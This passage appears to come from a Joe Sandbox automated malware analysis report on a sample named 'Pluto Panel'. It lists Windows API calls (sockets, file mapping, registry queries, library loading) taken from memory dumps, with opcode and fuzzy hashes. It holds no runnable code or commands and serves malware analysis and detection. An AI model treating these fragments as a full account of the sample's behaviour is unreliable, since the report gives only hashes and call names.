                                                                                                          • Instruction Fuzzy Hash: 43119072500205AFEB228F65DC85FABBBACEF04220F04846AED45DB251D678A549CFB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • OpenFileMappingW.KERNELBASE(?,?), ref: 03230575
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileMappingOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1680863896-0
                                                                                                          • Opcode ID: f35f5d6c74352bc09691a973d1b551bd49b0316bfa1c39b6fc6a996726d0140e
                                                                                                          • Instruction ID: 3e2edc98227b0eb32bfab171cedd054243dabd7b60d66d582694ecf3a8d0e7e3
                                                                                                          • Opcode Fuzzy Hash: f35f5d6c74352bc09691a973d1b551bd49b0316bfa1c39b6fc6a996726d0140e
                                                                                                          • Instruction Fuzzy Hash: DC21DFB1901241AFEB20DF65DC85B6AFBE8EF05220F08C4AAED469F241D375E448CB75
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: accept
                                                                                                          • String ID:
                                                                                                          • API String ID: 3005279540-0
                                                                                                          • Opcode ID: e40d28e790f06473487a4c357eac9a0828dcfb3bb2c1e3333fe8309d650e4a01
• Instruction ID: 6a4a78ac4f8e9fb6f6289f22bdcc6ac8af583fa7627a6d18c6485ae1b1ff4730
• Opcode Fuzzy Hash: e40d28e790f06473487a4c357eac9a0828dcfb3bb2c1e3333fe8309d650e4a01
• Instruction Fuzzy Hash: 3B21FDB1500241AFEB20DF64DC85BAAFBE8EF05620F1884AAED849B241D375F448CB71
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
• Opcode ID: a9dd56160523d53cd48c2dc0a3f7ca7a7088ef864cce333b05b5ad72775881ed
• Instruction ID: b4bdb86bd70592377af288a8ebfc18c12e2c64bc67a2402d47f29cf62663db8f
• Opcode Fuzzy Hash: a9dd56160523d53cd48c2dc0a3f7ca7a7088ef864cce333b05b5ad72775881ed
• Instruction Fuzzy Hash: D421DEB1500200AFEB21CF65DC84F5AFBE8EF08320F08845AED859B251D275A548CF71
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSASocketW.WS2_32(?,?,?,?,?), ref: 0167B8BA
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: Socket
• String ID:
• API String ID: 38366605-0
• Opcode ID: 6bd3ce53ee83dc778d9b8244e27430eb0c425175b2bae8649e7b6b33194e17d3
• Instruction ID: 2621f1729eaea3b19c4effad14784f54dc57c8d94939a34e5493aeb808f35aed
• Opcode Fuzzy Hash: 6bd3ce53ee83dc778d9b8244e27430eb0c425175b2bae8649e7b6b33194e17d3
• Instruction Fuzzy Hash: 7F21C071504640AFEB21DF65DD45B6AFBE8EF08320F18846EEE859B252D375A408CF71
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032302E0
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 0c02b02d448f935b0455afc06b076202dbe1a51263355ca87eaf272af53d0aae
• Instruction ID: 5053d4fa03f777442d3526c0afc79af9bd97bcdfadf887f6aaf3be8b74c83c8d
• Opcode Fuzzy Hash: 0c02b02d448f935b0455afc06b076202dbe1a51263355ca87eaf272af53d0aae
• Instruction Fuzzy Hash: 74117FB2504205AFEB20CE55DC45F67FBE8EF05610F08C56AED469B251D368E548CB71
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryShim.MSCOREE(?,?,?,?), ref: 03231AE9
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: LibraryLoadShim
• String ID:
• API String ID: 1475914169-0
• Opcode ID: 5f7a694fb8dd7527729928483dbae7daee5ab962828dc31c4a9c83f167d16035
• Instruction ID: f79389ad378e73a74e2573897562c310af03d264d94a1f4b26fd4a74b252fb57
• Opcode Fuzzy Hash: 5f7a694fb8dd7527729928483dbae7daee5ab962828dc31c4a9c83f167d16035
• Instruction Fuzzy Hash: 9F218EB1509384AFDB22CE15DC44B62FFF8EF46210F0980DAED848B252D265E818CB62
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessTimes.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230CB5
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: ProcessTimes
• String ID:
• API String ID: 1995159646-0
• Opcode ID: 35edbfbea1ac1276f6c939f7b5f51b3cd1879633d23d1d3ce77068823f59761d
• Instruction ID: c8326da3f2c85dfd92278615beda595f5113c1c89337b6a76c8573a0e75ab7e6
• Opcode Fuzzy Hash: 35edbfbea1ac1276f6c939f7b5f51b3cd1879633d23d1d3ce77068823f59761d
• Instruction Fuzzy Hash: 3611E6B2500201AFEB21CF65DC45F6AFBE8EF04320F08C86AED469B251C278A548DF71
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSAEventSelect.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032312AA
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: EventSelect
• String ID:
• API String ID: 31538577-0
• Opcode ID: a38c6fa68b594fcfd5cc0393d435b189bc6abb6f0e61763f3c8d80783879a0b7
• Instruction ID: d234c06959799f96233d836ca43670f16fb6fda413b9379cc3e0a613a1ef9764
• Opcode Fuzzy Hash: a38c6fa68b594fcfd5cc0393d435b189bc6abb6f0e61763f3c8d80783879a0b7
• Instruction Fuzzy Hash: 8E11D3B2404205AFE710DF90DC44F9AFBACEF04220F18846AED45DB251D678A1488FB1
Uniqueness

Uniqueness Score: -1.00%

APIs
• getsockname.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230FE3
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: getsockname
• String ID:
• API String ID: 3358416759-0
• Opcode ID: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
• Instruction ID: 7926d3547d8d9ee414bcba760ac104e06fa46e579112d4f4fdb4e5fba182aba8
• Opcode Fuzzy Hash: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
• Instruction Fuzzy Hash: 0F1190B1504201AFE720DF55DC85BAAFBACEF05220F08C4AAED459B251D678A5488A71
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNELBASE(?), ref: 0167A6CC
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: a0502b311a40918ced5298c0c28a5489821224fb2ec7f22a06c1236cf3285bb5
• Instruction ID: eb80cc5126f57e42a06a17a85739dfa5c6831222e94783a1f83ca48d2d8ff9a2
• Opcode Fuzzy Hash: a0502b311a40918ced5298c0c28a5489821224fb2ec7f22a06c1236cf3285bb5
• Instruction Fuzzy Hash: F221366140E3C4AFDB138B259C54662BFB4EF47624F0980DBED858F2A3D2695908DB72
Uniqueness

Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0167A61A
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 5e27477ac292387177b8f7f520212001b71df7399c1878454fa535511a62ed47
• Instruction ID: b5cb5a2db98b5c600343355cde838811b04a35dcd9d2b8d8becf7327d8f5e04b
• Opcode Fuzzy Hash: 5e27477ac292387177b8f7f520212001b71df7399c1878454fa535511a62ed47
• Instruction Fuzzy Hash: CB118471409380AFDB228F55DC44A62FFF4EF4A220F0885DAED858F253C375A418DB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230091
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 3baebd17363048e57be2fdd52d3f2536613e914f1d5fe8357f10d767e48ff565
• Instruction ID: a60f62cf289dd2229fec68f00adbbfbfdca3ec9196b9e0f2c306d5c75bc62d1e
• Opcode Fuzzy Hash: 3baebd17363048e57be2fdd52d3f2536613e914f1d5fe8357f10d767e48ff565
• Instruction Fuzzy Hash: E011C472504201AFEB21CF51DC44F9AFBA8EF04320F08C46AED459F251C279A548CFB1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 03230226
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 44a54f043744a56b1af2d775f0dfdb8d3e0e1d7aecee5553e34262422a6a9da6
• Instruction ID: 940ab0ecdd70c407cf8de9bf79de98b9993a773cb9de45bf7544722dcfd550f3
• Opcode Fuzzy Hash: 44a54f043744a56b1af2d775f0dfdb8d3e0e1d7aecee5553e34262422a6a9da6
• Instruction Fuzzy Hash: BB11E671509380AFC3118B26CC45F26FFB4EF86620F09819AED484B282D225F804CBA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• ioctlsocket.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032310BF
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: ioctlsocket
• String ID:
• API String ID: 3577187118-0
• Opcode ID: 79c240e09c91e663632627e4f366ff17a52943b4abbbf7e397d1a9b0cf995af7
• Instruction ID: ba4c6f3541ab321a298b02f73b7c830f0bb9775b9a1a756cf837142d03b31cd6
• Opcode Fuzzy Hash: 79c240e09c91e663632627e4f366ff17a52943b4abbbf7e397d1a9b0cf995af7
• Instruction Fuzzy Hash: 4011E3B1504241AFEB10DF55DC85BAAFBACEF05320F08C4AAED459F251C278A5488FB1
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(?), ref: 0167A32C
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 2b7b8de31d29db011f3154d9df5b3b176278598dee9c48cf0e8a49aa00a2f76f
• Instruction ID: dbc1be69bec7db33ee3af5c600c48eb88ef393d27d69846c1febbb9196c555de
• Opcode Fuzzy Hash: 2b7b8de31d29db011f3154d9df5b3b176278598dee9c48cf0e8a49aa00a2f76f
• Instruction Fuzzy Hash: CB11A7715093C0AFDB128F25DC55756BFB8EF06220F0884EBED858F653D2749808CB62
Uniqueness

Uniqueness Score: -1.00%

APIs
• MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 03231504
Memory Dump Source
• Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0
• Opcode ID: 0d54cff28b243de52e579693314431f8fa2414348c9148800370791a84d39ab0
• Instruction ID: a5c6231129421d1e99d3127609aaadf0c31c621640e3df096ebfdc288049a92f
• Opcode Fuzzy Hash: 0d54cff28b243de52e579693314431f8fa2414348c9148800370791a84d39ab0
• Instruction Fuzzy Hash: 0A119071409380AFDB21CF55DC44B56FFB4EF06220F09899EED858F262C375A418DB61
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
Similarity
• API ID: closesocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 2781271927-0
                                                                                                          • Opcode ID: 4bfb20299c1a0171083b6a83a743c289c17df276ab3b55c022ddb5504eb9944c
                                                                                                          • Instruction ID: e57c88e682d536476d6e78e8481d0447dbc2c7a94569ad2e717b149845752e5c
                                                                                                          • Opcode Fuzzy Hash: 4bfb20299c1a0171083b6a83a743c289c17df276ab3b55c022ddb5504eb9944c
                                                                                                          • Instruction Fuzzy Hash: DC11BF71449384AFDB128F15DC45B56BFB4EF06220F1884DAED858F253D279A808CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167BD95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: 1b13cd159e54a67c65476009535900714afd3f2d06ca8215fab56dd8911dd52d
                                                                                                          • Instruction ID: c390c2a9429043d721ab67183dc80f6199dd477174027df1dbad30cfebea0049
                                                                                                          • Opcode Fuzzy Hash: 1b13cd159e54a67c65476009535900714afd3f2d06ca8215fab56dd8911dd52d
                                                                                                          • Instruction Fuzzy Hash: AA01F576504200AFE711CF55DC85BAAFBA8EF04720F18C4AAED45AF251D27CA508CEB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0323146E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileMapping
                                                                                                          • String ID:
                                                                                                          • API String ID: 524692379-0
                                                                                                          • Opcode ID: 1765ed42a672776a93e5e2b852011ff1cc4388866df7099a992a3615b4d8b8e3
                                                                                                          • Instruction ID: a72d1d3e4e74c518f8c6d1454d9ed7a0ee0db72e7b47a76beafeb317b18faf8b
                                                                                                          • Opcode Fuzzy Hash: 1765ed42a672776a93e5e2b852011ff1cc4388866df7099a992a3615b4d8b8e3
                                                                                                          • Instruction Fuzzy Hash: C201B172901600ABD710DF16DC86B26FBA8FB88A20F14812AED088B641E275F515CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0167A1C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup
                                                                                                          • String ID:
                                                                                                          • API String ID: 724789610-0
                                                                                                          • Opcode ID: 85ea9b17d531ba548d72d5954391662748219892a84cd453da4301b5c6f3190f
                                                                                                          • Instruction ID: c42ada3df638965e1bec20b5469ddeba045aa3765d802ded8d6e0c08cdcf4434
                                                                                                          • Opcode Fuzzy Hash: 85ea9b17d531ba548d72d5954391662748219892a84cd453da4301b5c6f3190f
                                                                                                          • Instruction Fuzzy Hash: 1101D471901600ABD710DF16DC86B26FBB8FF88A20F14816AED088B741E275F515CBE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 03231AE9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoadShim
                                                                                                          • String ID:
                                                                                                          • API String ID: 1475914169-0
                                                                                                          • Opcode ID: 0d22260b680feb962d885d4e174ee7cf1af9eee4bde1a5137454f10ced3b65a9
                                                                                                          • Instruction ID: 7119a81e208e5785d11e86dd72ab0384a30030f64448fa15063daa28fc769884
                                                                                                          • Opcode Fuzzy Hash: 0d22260b680feb962d885d4e174ee7cf1af9eee4bde1a5137454f10ced3b65a9
                                                                                                          • Instruction Fuzzy Hash: 070180B26102019FDB20DE15D884B16FBE8EF05621F08809ADD458B315D275F458CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0167A61A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: f2565b6d1888960af172a0f004b968ef3f1dbc3f89f775c701a17620e2d509a6
                                                                                                          • Instruction ID: 1e441d531840f6aef785f88e3e486122b4b879e18ab238d9ae2b17389fce51aa
                                                                                                          • Opcode Fuzzy Hash: f2565b6d1888960af172a0f004b968ef3f1dbc3f89f775c701a17620e2d509a6
                                                                                                          • Instruction Fuzzy Hash: 6D016D72404600DFDB218F95DC44B5AFFE4EF48620F08C5AAEE894B616D375E019DF62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 03230226
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: d1c5f5b23e1a66c53ab3b8f27a5a14fc36eddad22feb28cbed48be5e06a87015
                                                                                                          • Instruction ID: 46049f89a3972b7d09af81a4ecff5b0cc83f1b6d75e42c9fd086adc4c3a9382c
                                                                                                          • Opcode Fuzzy Hash: d1c5f5b23e1a66c53ab3b8f27a5a14fc36eddad22feb28cbed48be5e06a87015
                                                                                                          • Instruction Fuzzy Hash: F801A271500601ABD710DF16DC86B26FBA8FB88A20F14815AED084B741E275F515CBE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 03231504
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileView
                                                                                                          • String ID:
                                                                                                          • API String ID: 3314676101-0
                                                                                                          • Opcode ID: 09a5a243a4d17f8d449d8c9dbf5d408ff4ab4c17f36a1a6515f133acced40cbe
                                                                                                          • Instruction ID: 0a80fa79ff7ef14075809f3148fabe23c0081aa6510956775113188b5719539d
                                                                                                          • Opcode Fuzzy Hash: 09a5a243a4d17f8d449d8c9dbf5d408ff4ab4c17f36a1a6515f133acced40cbe
                                                                                                          • Instruction Fuzzy Hash: 13018C725152409FDB20DF55E844B56FFE4EF04220F08C8AADE464B616D275E068DF62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0167A32C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: dcb4ded9312daa1028ab5a364e2f62147813489e393364296c4297ec1187b97a
                                                                                                          • Instruction ID: cd8c1f66144f3726fe3f1eb8af980659b7821d8ce0d00cb99eec235fcc64ff77
                                                                                                          • Opcode Fuzzy Hash: dcb4ded9312daa1028ab5a364e2f62147813489e393364296c4297ec1187b97a
                                                                                                          • Instruction Fuzzy Hash: 380171719042418FDB108F69EC8576AFBA4EF04631F08C4AADD49CF356D2799408CE62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0167B802
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 396fcdcc2311eed5976a923e9639d4adc8f290eda2ecc119d495c01c14925c7c
                                                                                                          • Instruction ID: 8a17e7045c233db539a4bed82dfa1319051bb95be42af212efa8bd12c11a3de4
                                                                                                          • Opcode Fuzzy Hash: 396fcdcc2311eed5976a923e9639d4adc8f290eda2ecc119d495c01c14925c7c
                                                                                                          • Instruction Fuzzy Hash: 9C01A272500601ABD310DF16DC86B26FBA8FB88A20F14C11AED084B741E375F515CBE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: closesocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 2781271927-0
                                                                                                          • Opcode ID: 13045918fb783b85a3f15834ed29cbb4edd7cb9aa408009559f4b7a80b097ad7
                                                                                                          • Instruction ID: c2532e9cd593687de0e7b3f947f598b8e8166b1891786d1186469fcc00aded88
                                                                                                          • Opcode Fuzzy Hash: 13045918fb783b85a3f15834ed29cbb4edd7cb9aa408009559f4b7a80b097ad7
                                                                                                          • Instruction Fuzzy Hash: 1501AD759042418FDB10CF59EC8476AFFA4EF04220F18C4AADD498F316D379A509CFA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0167A6CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: c0de736815bef454520b5d04c9164b33a34ac4fab2b80f7a3cb922d70af8394e
                                                                                                          • Instruction ID: 32c23939944d8dcd626769df569cdc9a451a6f28e4da4f705d68c7f1acc4a22a
                                                                                                          • Opcode Fuzzy Hash: c0de736815bef454520b5d04c9164b33a34ac4fab2b80f7a3cb922d70af8394e
                                                                                                          • Instruction Fuzzy Hash: 5AF0A9359042419FDB208F59EC8876AFFA0EF44221F18C1AADD494F326D379A449DEA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :@!q
                                                                                                          • API String ID: 0-1708465744
                                                                                                          • Opcode ID: b88dd5247d39d34cbea71d78833bd70367fc7da2b584ae47b5e7be47fb9eb0b2
                                                                                                          • Instruction ID: af4080b87dd5625f39e0bb63eff0d378bbfcda0ddaa029f12fdc2332f194eb8f
                                                                                                          • Opcode Fuzzy Hash: b88dd5247d39d34cbea71d78833bd70367fc7da2b584ae47b5e7be47fb9eb0b2
                                                                                                          • Instruction Fuzzy Hash: 6A71F570E11219CFEB14DFA5C894BADBBB2BF48310F1481A9D509BB3A1DB759989CF10
                                                                                                          Uniqueness
                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 206cf12b5967c7f06dabf16205ed432fe52edd0bf67d318451af0455d93b6f29
                                                                                                          • Instruction ID: 1a93492f0e25995aebbd6128a72e521782f1a38c0ba842f52b0bccc276edf56a
                                                                                                          • Opcode Fuzzy Hash: 206cf12b5967c7f06dabf16205ed432fe52edd0bf67d318451af0455d93b6f29
                                                                                                          • Instruction Fuzzy Hash: A5F1A734A0120AEFCB04DFA4D4949DEB7B2FF85308F2545A8D4056B369EB766E4ACF50
                                                                                                          Uniqueness
                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
